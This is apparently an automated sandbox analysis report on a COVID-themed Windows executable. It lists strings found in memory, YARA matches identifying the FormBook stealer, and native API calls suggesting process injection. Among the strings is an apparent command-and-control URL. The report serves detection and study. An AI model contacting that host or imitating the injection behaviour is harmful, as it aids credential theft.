          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226091255.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com0
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com=
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF&
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225516592.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comaA
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsF
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdZ
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226140808.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdic
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdl
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comeH
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225516592.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessedZ
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225158941.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgritoe
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226795444.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comlic0
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comnc./S
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comoitu
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comow
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comzana
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.221689950.0000000007923000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn$
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.221689950.0000000007923000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn=
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.229096001.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.228852233.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.228815722.0000000007942000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.229096001.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmpu
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-cz
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222363668.0000000007913000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/?
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/A
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222719848.000000000791A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/H
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/S
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0e
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Z
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ghtsl
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/-
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/?
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/H
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Z
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/~
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/w
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225451084.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.7
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.227697228.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de.
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.224891432.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de3z
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deXz
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deo
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: msiexec.exe, 0000000E.00000002.622832165.000000000501F000.00000004.00000001.sdmpString found in binary or memory: https://www.johnemotions.com/p95n/?oH5h=OkCbzDuuF1pG8/

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041A070 NtClose,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041A120 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00419F40 NtCreateFile,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00419FF0 NtReadFile,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041A072 NtClose,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041A11B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00419F3A NtCreateFile,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00419FEA NtReadFile,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015599D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0155B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0155A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559560 NtWriteFile,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0155AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015595F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0155A770 NtOpenThread,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0155A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015596D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045CAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045CA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045CA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045CB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045CA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069A070 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069A120 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00699F40 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00699FF0 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069A072 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069A11B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00699F3A NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00699FEA NtReadFile,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC21D9
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC0470
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC1770
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC0EF8
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC4000
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC5230
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC5220
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC5438
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC5429
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC5698
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC5689
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC5852
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC0E78
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC4E78
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC3FF0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_04BB2668
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_04BB058F
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_04BB06B0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_0974F538
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00401026
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D183
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D186
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041EB42
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041EC05
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041E4CE
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00402D87
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00409E40
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0151F900
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01534120
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D1002
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015EE824
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E28EC
